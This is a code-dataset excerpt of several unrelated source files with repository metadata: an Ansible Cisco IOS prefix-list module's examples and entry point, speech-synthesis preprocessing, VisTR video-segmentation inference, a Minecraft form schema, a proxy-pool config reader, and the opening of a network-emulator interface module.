# "commands": [
# "no ip prefix-list test",
# "no ip prefix-list test_prefix",
# "ip prefix-list 10 description this is override test",
# "no ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10",
# "no ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15",
# "ip prefix-list test_override seq 10 deny 35.0.0.0/8 ge 20",
# "ip prefix-list test_override description this is override test",
# "no ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80",
# "ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100",
# "ipv6 prefix-list test_ipv6 description this is ipv6 override test"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is override test
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test_override description this is override test
# ip prefix-list test_override seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 override test
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100
# Using replaced
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Replaced provided Prefix lists configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
description: this is replace test
entries:
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 15
- action: deny
prefix: 14.0.0.0/8
ge: 20
le: 21
sequence: 20
- name: test_replace
description: this is replace test
entries:
- action: deny
prefix: 35.0.0.0/8
ge: 20
sequence: 10
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 replace test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 10
state: replaced
# Commands Fired:
# ---------------
# "commands": [
# "ip prefix-list 10 description this is replace test",
# "no ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10",
# "no ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15",
# "ip prefix-list test_replace seq 10 deny 35.0.0.0/8 ge 20",
# "ip prefix-list test_replace description this is replace test",
# "no ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80",
# "ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100",
# "ipv6 prefix-list test_ipv6 description this is ipv6 replace test"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is replace test
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ip prefix-list test_replace description this is replace test
# ip prefix-list test_replace seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 replace test
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 le 100
# Using Gathered
# Before state:
# -------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Gather Prefix lists provided configurations
cisco.ios.ios_prefix_lists:
config:
state: gathered
# Module Execution Result:
# ------------------------
#
# "gathered": [
# {
# "afi": "ipv4",
# "prefix_lists": [
# {
# "description": "this is test description"
# "entries": [
# {
# "action": "deny",
# "le": 15,
# "prefix": "1.0.0.0/8",
# "sequence": 5
# },
# {
# "action": "deny",
# "ge": 10,
# "prefix": "35.0.0.0/8",
# "sequence": 10
# },
# {
# "action": "deny",
# "ge": 15,
# "prefix": "12.0.0.0/8",
# "sequence": 15
# },
# {
# "action": "deny",
# "ge": 20,
# "le": 21,
# "prefix": "14.0.0.0/8",
# "sequence": 20
# }
# ],
# "name": "10"
# },
# {
# "description": "this is test"
# "entries": [
# {
# "action": "deny",
# "ge": 15,
# "prefix": "12.0.0.0/8",
# "sequence": 50
# }
# ],
# "name": "test"
# },
# {
# "description": "this is for prefix-list"
# "entries": [
# {
# "action": "deny",
# "ge": 10,
# "le": 15,
# "prefix": "35.0.0.0/8",
# "sequence": 5
# },
# {
# "action": "deny",
# "ge": 20,
# "prefix": "35.0.0.0/8",
# "sequence": 10
# }
# ],
# "name": "test_prefix"
# }
# ]
# },
# {
# "afi": "ipv6",
# "prefix_lists": [
# {
# "description": "this is ipv6 prefix-list"
# "entries": [
# {
# "action": "deny",
# "ge": 80,
# "prefix": "2001:DB8:0:4::/64",
# "sequence": 10
# }
# ],
# "name": "test_ipv6"
# }
# ]
# }
# ]
# After state:
# ------------
#
# router-ios#sh running-config | section ^ip prefix-list|^ipv6 prefix-list
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
# Using Rendered
- name: Render the commands for provided configuration
cisco.ios.ios_prefix_lists:
config:
- afi: ipv4
prefix_lists:
- name: 10
description: this is new merge test
entries:
- action: deny
prefix: 1.0.0.0/8
le: 15
sequence: 5
- action: deny
prefix: 35.0.0.0/8
ge: 10
sequence: 10
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 15
- action: deny
prefix: 14.0.0.0/8
ge: 20
le: 21
sequence: 20
- name: test
description: this is merge test
entries:
- action: deny
prefix: 12.0.0.0/8
ge: 15
sequence: 50
- name: test_prefix
description: this is for prefix-list
entries:
- action: deny
prefix: 35.0.0.0/8
ge: 10
le: 15
sequence: 5
- action: deny
prefix: 35.0.0.0/8
ge: 20
sequence: 10
- afi: ipv6
prefix_lists:
- name: test_ipv6
description: this is ipv6 merge test
entries:
- action: deny
prefix: 2001:DB8:0:4::/64
ge: 80
le: 100
sequence: 10
state: rendered
# Module Execution Result:
# ------------------------
#
# "rendered": [
# "ip prefix-list test description this is test",
# "ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15",
# "ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15",
# "ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10",
# "ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15",
# "ip prefix-list 10 description this is test description",
# "ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21",
# "ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20",
# "ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15",
# "ip prefix-list test_prefix description this is for prefix-list",
# "ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80 l2 100",
# "ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list"
# ]
# Using Parsed
# File: parsed.cfg
# ----------------
#
# ip prefix-list 10 description this is test description
# ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15
# ip prefix-list 10 seq 10 deny 35.0.0.0/8 ge 10
# ip prefix-list 10 seq 15 deny 12.0.0.0/8 ge 15
# ip prefix-list 10 seq 20 deny 14.0.0.0/8 ge 20 le 21
# ip prefix-list test description this is test
# ip prefix-list test seq 50 deny 12.0.0.0/8 ge 15
# ip prefix-list test_prefix description this is for prefix-list
# ip prefix-list test_prefix seq 5 deny 35.0.0.0/8 ge 10 le 15
# ip prefix-list test_prefix seq 10 deny 35.0.0.0/8 ge 20
# ipv6 prefix-list test_ipv6 description this is ipv6 prefix-list
# ipv6 prefix-list test_ipv6 seq 10 deny 2001:DB8:0:4::/64 ge 80
- name: Parse the provided configuration with the existing running configuration
cisco.ios.ios_prefix_lists:
running_config: "{{ lookup('file', 'parsed.cfg') }}"
state: parsed
# Module Execution Result:
# ------------------------
#
# "parsed": [
# {
# "afi": "ipv4",
# "prefix_lists": [
# {
# "description": "this is test description"
# "entries": [
# {
# "action": "deny",
# "le": 15,
# "prefix": "1.0.0.0/8",
# "sequence": 5
# },
# {
# "action": "deny",
# "ge": 10,
# "prefix": "35.0.0.0/8",
# "sequence": 10
# },
# {
# "action": "deny",
# "ge": 15,
# "prefix": "12.0.0.0/8",
# "sequence": 15
# },
# {
# "action": "deny",
# "ge": 20,
# "le": 21,
# "prefix": "14.0.0.0/8",
# "sequence": 20
# }
# ],
# "name": "10"
# },
# {
# "description": "this is test"
# "entries": [
# {
# "action": "deny",
# "ge": 15,
# "prefix": "12.0.0.0/8",
# "sequence": 50
# }
# ],
# "name": "test"
# },
# {
# "description": "this is for prefix-list"
# "entries": [
# {
# "action": "deny",
# "ge": 10,
# "le": 15,
# "prefix": "35.0.0.0/8",
# "sequence": 5
# },
# {
# "action": "deny",
# "ge": 20,
# "prefix": "35.0.0.0/8",
# "sequence": 10
# }
# ],
# "name": "test_prefix"
# }
# ]
# },
# {
# "afi": "ipv6",
# "prefix_lists": [
# {
# "description": "this is ipv6 prefix-list"
# "entries": [
# {
# "action": "deny",
# "ge": 80,
# "prefix": "2001:DB8:0:4::/64",
# "sequence": 10
# }
# ],
# "name": "test_ipv6"
# }
# ]
# }
# ]
"""
RETURN = """
before:
  description: The configuration prior to the module invocation.
returned: always
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: list
after:
  description: The resulting configuration after module invocation.
returned: when changed
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: list
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['ip prefix-list 10 description this is test description', 'ip prefix-list 10 seq 5 deny 1.0.0.0/8 le 15']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.argspec.prefix_lists.prefix_lists import (
Prefix_listsArgs,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.config.prefix_lists.prefix_lists import (
Prefix_lists,
)
def main():
"""
Main entry point for module execution
    :returns: the result from module invocation
"""
module = AnsibleModule(
argument_spec=Prefix_listsArgs.argument_spec,
mutually_exclusive=[["config", "running_config"]],
required_if=[
["state", "merged", ["config"]],
["state", "replaced", ["config"]],
["state", "overridden", ["config"]],
["state", "rendered", ["config"]],
["state", "parsed", ["running_config"]],
],
supports_check_mode=True,
)
result = Prefix_lists(module).execute_module()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 35.621064
| 116
| 0.531563
|
00c6a6c9fe1c03a0f1587f3acbd988ea90a6d088
| 2,657
|
py
|
Python
|
preprocess.py
|
yoojungsun0/multi_emotional_tacotron
|
8440fdbbe902d0d254c5291d4146743ac7bd5446
|
[
"MIT"
] | 3
|
2019-12-02T00:39:35.000Z
|
2020-05-12T14:01:49.000Z
|
preprocess.py
|
yoojungsun0/multi_emotional_tacotron
|
8440fdbbe902d0d254c5291d4146743ac7bd5446
|
[
"MIT"
] | 2
|
2020-03-24T17:55:12.000Z
|
2020-03-31T10:23:45.000Z
|
preprocess.py
|
yoojungsun0/multi-emotional-tacotron
|
8440fdbbe902d0d254c5291d4146743ac7bd5446
|
[
"MIT"
] | 1
|
2020-06-09T03:24:11.000Z
|
2020-06-09T03:24:11.000Z
|
# coding: utf-8
"""
python preprocess.py --num_workers 10 --name son --in_dir .\datasets\son --out_dir .\data\son
python preprocess.py --num_workers 10 --name moon --in_dir .\datasets\moon --out_dir .\data\moon
==> In out_dir, an npz file bundling 'audio', 'mel', 'linear', 'time_steps', 'mel_frames', 'text', 'tokens', and 'loss_coeff' is created.
"""
import argparse
import os
from multiprocessing import cpu_count
from tqdm import tqdm
import importlib
from hparams import hparams, hparams_debug_string
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
def preprocess(mod, in_dir, out_dir, num_workers):
os.makedirs(out_dir, exist_ok=True)
metadata = mod.build_from_path(hparams, in_dir, out_dir,num_workers=num_workers, tqdm=tqdm)
write_metadata(metadata, out_dir)
def write_metadata(metadata, out_dir):
with open(os.path.join(out_dir, 'train.txt'), 'w', encoding='utf-8') as f:
for m in metadata:
f.write('|'.join([str(x) for x in m]) + '\n')
mel_frames = sum([int(m[4]) for m in metadata])
timesteps = sum([int(m[3]) for m in metadata])
sr = hparams.sample_rate
hours = timesteps / sr / 3600
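    # Sanity check (hypothetical numbers, not from any real run): at a 22050 Hz
    # sample rate, 79,380,000 audio timesteps correspond to
    # 79,380,000 / 22050 / 3600 = 1.0 hour of audio.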
print('Write {} utterances, {} mel frames, {} audio timesteps, ({:.2f} hours)'.format(len(metadata), mel_frames, timesteps, hours))
print('Max input length (text chars): {}'.format(max(len(m[5]) for m in metadata)))
print('Max mel frames length: {}'.format(max(int(m[4]) for m in metadata)))
print('Max audio timesteps length: {}'.format(max(m[3] for m in metadata)))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--name', type=str, default=None)
parser.add_argument('--in_dir', type=str, default=None)
parser.add_argument('--out_dir', type=str, default=None)
parser.add_argument('--num_workers', type=str, default=None)
parser.add_argument('--hparams', type=str, default=None)
args = parser.parse_args()
if args.hparams is not None:
hparams.parse(args.hparams)
print(hparams_debug_string())
name = args.name
in_dir = args.in_dir
out_dir = args.out_dir
num_workers = args.num_workers
    num_workers = cpu_count() if num_workers is None else int(num_workers)  # cpu_count() = number of processes
print("Sampling frequency: {}".format(hparams.sample_rate))
assert name in ["cmu_arctic", "ljspeech", "son", "moon","angry","fear","happy","neutral","sad","surprise","YAF_angry","YAF_disgust","YAF_fear","YAF_happy","YAF_neutral","YAF_pleasant_surprised","YAF_sad"]
mod = importlib.import_module('datasets.{}'.format(name))
preprocess(mod, in_dir, out_dir, num_workers)
| 42.854839
| 208
| 0.693263
|
031d3aa4c3fac8d5b517e9bfdc3071dcbbbb4d55
| 11,544
|
py
|
Python
|
inference.py
|
rbli-john/VisTR
|
f49b4a2773cbbd2502e21c879fc3ad8e832f6296
|
[
"Apache-2.0"
] | null | null | null |
inference.py
|
rbli-john/VisTR
|
f49b4a2773cbbd2502e21c879fc3ad8e832f6296
|
[
"Apache-2.0"
] | null | null | null |
inference.py
|
rbli-john/VisTR
|
f49b4a2773cbbd2502e21c879fc3ad8e832f6296
|
[
"Apache-2.0"
] | null | null | null |
'''
Inference code for VisTR
Modified from DETR (https://github.com/facebookresearch/detr)
'''
import argparse
import datetime
import json
import random
import time
from pathlib import Path
import numpy as np
import torch
from torch.utils.data import DataLoader, DistributedSampler
import datasets
import util.misc as utils
from datasets import build_dataset, get_coco_api_from_dataset
from engine import evaluate, train_one_epoch
from models import build_model
import torchvision.transforms as T
import matplotlib.pyplot as plt
import os
from PIL import Image
import math
import torch.nn.functional as F
import json
from scipy.optimize import linear_sum_assignment
import pycocotools.mask as mask_util
def get_args_parser():
parser = argparse.ArgumentParser('Set transformer detector', add_help=False)
parser.add_argument('--lr', default=1e-4, type=float)
parser.add_argument('--lr_backbone', default=1e-5, type=float)
parser.add_argument('--batch_size', default=2, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float)
parser.add_argument('--epochs', default=150, type=int)
parser.add_argument('--lr_drop', default=100, type=int)
parser.add_argument('--clip_max_norm', default=0.1, type=float,
help='gradient clipping max norm')
# Model parameters
parser.add_argument('--model_path', type=str, default=None,
help="Path to the model weights.")
# * Backbone
parser.add_argument('--backbone', default='resnet101', type=str,
help="Name of the convolutional backbone to use")
parser.add_argument('--dilation', action='store_true',
help="If true, we replace stride with dilation in the last convolutional block (DC5)")
parser.add_argument('--position_embedding', default='sine', type=str, choices=('sine', 'learned'),
help="Type of positional embedding to use on top of the image features")
# * Transformer
parser.add_argument('--enc_layers', default=6, type=int,
help="Number of encoding layers in the transformer")
parser.add_argument('--dec_layers', default=6, type=int,
help="Number of decoding layers in the transformer")
parser.add_argument('--dim_feedforward', default=2048, type=int,
help="Intermediate size of the feedforward layers in the transformer blocks")
parser.add_argument('--hidden_dim', default=384, type=int,
help="Size of the embeddings (dimension of the transformer)")
parser.add_argument('--dropout', default=0.1, type=float,
help="Dropout applied in the transformer")
parser.add_argument('--nheads', default=8, type=int,
help="Number of attention heads inside the transformer's attentions")
parser.add_argument('--num_frames', default=36, type=int,
help="Number of frames")
parser.add_argument('--num_ins', default=10, type=int,
help="Number of instances")
parser.add_argument('--num_queries', default=360, type=int,
help="Number of query slots")
parser.add_argument('--pre_norm', action='store_true')
# * Segmentation
parser.add_argument('--masks', action='store_true',
help="Train segmentation head if the flag is provided")
# Loss
parser.add_argument('--no_aux_loss', dest='aux_loss', action='store_false',
help="Disables auxiliary decoding losses (loss at each layer)")
# * Matcher
parser.add_argument('--set_cost_class', default=1, type=float,
help="Class coefficient in the matching cost")
parser.add_argument('--set_cost_bbox', default=5, type=float,
help="L1 box coefficient in the matching cost")
parser.add_argument('--set_cost_giou', default=2, type=float,
help="giou box coefficient in the matching cost")
# * Loss coefficients
parser.add_argument('--mask_loss_coef', default=1, type=float)
parser.add_argument('--dice_loss_coef', default=1, type=float)
parser.add_argument('--bbox_loss_coef', default=5, type=float)
parser.add_argument('--giou_loss_coef', default=2, type=float)
parser.add_argument('--eos_coef', default=0.1, type=float,
help="Relative classification weight of the no-object class")
# dataset parameters
parser.add_argument('--img_path', default='data/ytvos/valid/JPEGImages/')
parser.add_argument('--ann_path', default='data/ytvos/annotations/instances_val_sub.json')
parser.add_argument('--save_path', default='results.json')
parser.add_argument('--dataset_file', default='ytvos')
parser.add_argument('--coco_path', type=str)
parser.add_argument('--coco_panoptic_path', type=str)
parser.add_argument('--remove_difficult', action='store_true')
parser.add_argument('--output_dir', default='output_ytvos',
help='path where to save, empty for no saving')
parser.add_argument('--device', default='cuda',
help='device to use for training / testing')
parser.add_argument('--seed', default=42, type=int)
parser.add_argument('--resume', default='', help='resume from checkpoint')
parser.add_argument('--start_epoch', default=0, type=int, metavar='N',
help='start epoch')
#parser.add_argument('--eval', action='store_true')
parser.add_argument('--eval', action='store_false')
parser.add_argument('--num_workers', default=0, type=int)
# distributed training parameters
parser.add_argument('--world_size', default=1, type=int,
help='number of distributed processes')
parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training')
return parser
CLASSES=['person','giant_panda','lizard','parrot','skateboard','sedan','ape',
'dog','snake','monkey','hand','rabbit','duck','cat','cow','fish',
'train','horse','turtle','bear','motorbike','giraffe','leopard',
'fox','deer','owl','surfboard','airplane','truck','zebra','tiger',
'elephant','snowboard','boat','shark','mouse','frog','eagle','earless_seal',
'tennis_racket']
COLORS = [[0.000, 0.447, 0.741], [0.850, 0.325, 0.098], [0.929, 0.694, 0.125],
[0.494, 0.184, 0.556], [0.466, 0.674, 0.188], [0.301, 0.745, 0.933],
[0.494, 0.000, 0.556], [0.494, 0.000, 0.000], [0.000, 0.745, 0.000],
[0.700, 0.300, 0.600]]
transform = T.Compose([
T.Resize(300),
T.ToTensor(),
T.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
# for output bounding box post-processing
def box_cxcywh_to_xyxy(x):
x_c, y_c, w, h = x.unbind(1)
b = [(x_c - 0.5 * w), (y_c - 0.5 * h),
(x_c + 0.5 * w), (y_c + 0.5 * h)]
return torch.stack(b, dim=1)
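# Worked example (hypothetical values): a normalized box centered at (0.5, 0.5)
# with width 0.2 and height 0.4 maps to corner form (0.4, 0.3, 0.6, 0.7), i.e.
#   box_cxcywh_to_xyxy(torch.tensor([[0.5, 0.5, 0.2, 0.4]]))
#   # -> tensor([[0.4000, 0.3000, 0.6000, 0.7000]])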
def rescale_bboxes(out_bbox, size):
img_w, img_h = size
b = box_cxcywh_to_xyxy(out_bbox)
b = b.cpu() * torch.tensor([img_w, img_h, img_w, img_h], dtype=torch.float32)
return b
def main(args):
# Test
start_time = time.time()
device = torch.device(args.device)
# fix the seed for reproducibility
seed = args.seed + utils.get_rank()
torch.manual_seed(seed)
np.random.seed(seed)
random.seed(seed)
num_frames = args.num_frames
num_ins = args.num_ins
with torch.no_grad():
model, criterion, postprocessors = build_model(args)
model.to(device)
state_dict = torch.load(args.model_path)['model']
model.load_state_dict(state_dict)
folder = args.img_path
videos = json.load(open(args.ann_path,'rb'))['videos']
vis_num = len(videos)
# Test
process_start_time = time.time()
inference_time_acc = 0.0
frame_count = 0
vis_num = 10
result = []
for i in range(vis_num):
print("Process video: ",i)
id_ = videos[i]['id']
length = videos[i]['length']
file_names = videos[i]['file_names']
clip_num = math.ceil(length/num_frames)
img_set=[]
if length<num_frames:
clip_names = file_names*(math.ceil(num_frames/length))
clip_names = clip_names[:num_frames]
else:
clip_names = file_names[:num_frames]
if len(clip_names)==0:
continue
if len(clip_names)<num_frames:
clip_names.extend(file_names[:num_frames-len(clip_names)])
for k in range(num_frames):
im = Image.open(os.path.join(folder,clip_names[k]))
img_set.append(transform(im).unsqueeze(0).cuda())
img=torch.cat(img_set,0)
# Test
frame_count += len(img_set)
inference_start_time = time.time()
# inference time is calculated for this operation
outputs = model(img)
inference_time_acc += time.time() - inference_start_time
# end of model inference
logits, boxes, masks = outputs['pred_logits'].softmax(-1)[0,:,:-1], outputs['pred_boxes'][0], outputs['pred_masks'][0]
pred_masks =F.interpolate(masks.reshape(num_frames,num_ins,masks.shape[-2],masks.shape[-1]),(im.size[1],im.size[0]),mode="bilinear").sigmoid().cpu().detach().numpy()>0.5
pred_logits = logits.reshape(num_frames,num_ins,logits.shape[-1]).cpu().detach().numpy()
pred_masks = pred_masks[:length]
pred_logits = pred_logits[:length]
pred_scores = np.max(pred_logits,axis=-1)
pred_logits = np.argmax(pred_logits,axis=-1)
for m in range(num_ins):
if pred_masks[:,m].max()==0:
continue
score = pred_scores[:,m].mean()
#category_id = pred_logits[:,m][pred_scores[:,m].argmax()]
category_id = np.argmax(np.bincount(pred_logits[:,m]))
instance = {'video_id':id_, 'score':float(score), 'category_id':int(category_id)}
segmentation = []
for n in range(length):
if pred_scores[n,m]<0.001:
segmentation.append(None)
else:
mask = (pred_masks[n,m]).astype(np.uint8)
rle = mask_util.encode(np.array(mask[:,:,np.newaxis], order='F'))[0]
rle["counts"] = rle["counts"].decode("utf-8")
segmentation.append(rle)
instance['segmentations'] = segmentation
result.append(instance)
# Test
print('Inference time: ', inference_time_acc)
print('Frame count: ', frame_count)
print('Inference time per frame: ', inference_time_acc / frame_count)
print('Process time (include image read, copy to cuda, but not model build): ', time.time() - process_start_time)
with open(args.save_path, 'w', encoding='utf-8') as f:
json.dump(result,f)
# Test
print('Total runtime (model build + inference + image read + copy to cuda ...): ', time.time() - start_time)
if __name__ == '__main__':
parser = argparse.ArgumentParser('VisTR inference script', parents=[get_args_parser()])
args = parser.parse_args()
main(args)
| 43.727273
| 181
| 0.615731
|
5ec383f21b463750485cbd3190ff312add2248d5
| 141
|
py
|
Python
|
src/tentaclio_gs/__main__.py
|
octoenergy/tentaclio-gs
|
cb4e6d8c61b7ef64a5b41fa5d3b8c857c12ae945
|
[
"MIT"
] | null | null | null |
src/tentaclio_gs/__main__.py
|
octoenergy/tentaclio-gs
|
cb4e6d8c61b7ef64a5b41fa5d3b8c857c12ae945
|
[
"MIT"
] | null | null | null |
src/tentaclio_gs/__main__.py
|
octoenergy/tentaclio-gs
|
cb4e6d8c61b7ef64a5b41fa5d3b8c857c12ae945
|
[
"MIT"
] | 1
|
2022-01-14T00:33:18.000Z
|
2022-01-14T00:33:18.000Z
|
# Helper cli to encode urls.
from tentaclio.__main__ import main
if __name__ == "__main__":
main(prog_name="python -m tentaclio-gs")
| 15.666667
| 44
| 0.716312
|
b47cce4ceaeb6d6f280059f708ff8cb6b0dfd18c
| 777
|
py
|
Python
|
ezotv/schemas/minecraft_form_schema.py
|
marcsello/ezotv-frontend
|
405c440a567e8a0f1577f10d45385f3171398afe
|
[
"CC0-1.0"
] | null | null | null |
ezotv/schemas/minecraft_form_schema.py
|
marcsello/ezotv-frontend
|
405c440a567e8a0f1577f10d45385f3171398afe
|
[
"CC0-1.0"
] | 7
|
2020-01-23T00:50:39.000Z
|
2020-04-18T20:34:40.000Z
|
ezotv/schemas/minecraft_form_schema.py
|
marcsello/ezotv-frontend
|
405c440a567e8a0f1577f10d45385f3171398afe
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
from marshmallow import Schema, fields, validates_schema, ValidationError, pre_load, validates, RAISE
from marshmallow.validate import Regexp, Length
class MinecraftFormSchema(Schema):
minecraft_name = fields.Str(required=True, validate=[Length(min=3, max=16), Regexp("^[A-Za-z0-9_]*$")])
password = fields.Str(required=True, validate=Length(min=6))
password_verify = fields.Str(load_only=True, required=True, validate=Length(min=6))
submit = fields.Str(load_only=True, required=False, allow_none=True)
@validates_schema
def validate_password(self, data, **kwargs):
if data["password"] != data["password_verify"]:
raise ValidationError("Passwords do not match!")
class Meta:
unknown = RAISE
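# Illustrative usage sketch (payload values are hypothetical): loading
# {"minecraft_name": "Steve_01", "password": "hunter22", "password_verify": "hunter22"}
# with MinecraftFormSchema().load(...) returns the validated data, while mismatched
# passwords or an unexpected extra field raise a marshmallow ValidationError.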
| 35.318182
| 107
| 0.715573
|
ccb55ad8d96015715d4174d24b9da926cbfbffbf
| 878
|
py
|
Python
|
config.py
|
wtq2255/free_proxy_pool
|
c6ac0b3fbf4ab4c0da53eb6372ecf2187f635c17
|
[
"MIT"
] | 1
|
2018-01-24T10:47:52.000Z
|
2018-01-24T10:47:52.000Z
|
config.py
|
wtq2255/free_proxy_pool
|
c6ac0b3fbf4ab4c0da53eb6372ecf2187f635c17
|
[
"MIT"
] | null | null | null |
config.py
|
wtq2255/free_proxy_pool
|
c6ac0b3fbf4ab4c0da53eb6372ecf2187f635c17
|
[
"MIT"
] | null | null | null |
import configparser
conf=configparser.ConfigParser()
conf.read('./proxy.conf')
def get_redis(name):
redis_conf = conf.get('redis', name)
t1, t2 = redis_conf.strip().split(':')[-2:]
password, host = t1.strip().split('@')
port, db = t2.strip().split('/')
return {'host': host,
'port': int(port),
'password': password or None,
'db': int(db)}
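# Minimal usage sketch (assumes proxy.conf has a [redis] section with an entry such as
# "main = redis://:secret@127.0.0.1:6379/0"; the key name and URL are hypothetical, and
# only the trailing password@host:port/db portion is what get_redis actually parses):
#   get_redis('main')
#   # -> {'host': '127.0.0.1', 'port': 6379, 'password': 'secret', 'db': 0}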
def get_proxy_url(name=None):
if name is None:
return list(zip(*conf.items('proxy_url')))[1]
else:
if conf.has_option('proxy_url', name):
return conf.get('proxy_url', name)
else:
return None
def get_check(option=None):
if option is None:
return dict(conf.items('check'))
else:
if conf.has_option('check', option):
return conf.get('check', option)
else:
return None
| 25.085714
| 53
| 0.56492
|
7fda18c78f0939ab624b76eaa142fde7a5409e8d
| 19,434
|
py
|
Python
|
daemon/core/nodes/interface.py
|
ruohonej/core
|
31e6839ac5a9a5e2b1d8840e32b9ad1f5b2606a1
|
[
"BSD-2-Clause"
] | 1
|
2022-02-12T06:34:49.000Z
|
2022-02-12T06:34:49.000Z
|
daemon/core/nodes/interface.py
|
kestasjk/core
|
31e6839ac5a9a5e2b1d8840e32b9ad1f5b2606a1
|
[
"BSD-2-Clause"
] | null | null | null |
daemon/core/nodes/interface.py
|
kestasjk/core
|
31e6839ac5a9a5e2b1d8840e32b9ad1f5b2606a1
|
[
"BSD-2-Clause"
] | null | null | null |
"""
virtual ethernet classes that implement the interfaces available under Linux.
"""
import logging
import time
from pathlib import Path
from typing import TYPE_CHECKING, Callable, Dict, List, Optional, Tuple
import netaddr
from core import utils
from core.emulator.data import LinkOptions
from core.emulator.enumerations import TransportType
from core.errors import CoreCommandError, CoreError
from core.nodes.netclient import LinuxNetClient, get_net_client
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from core.emulator.distributed import DistributedServer
from core.emulator.session import Session
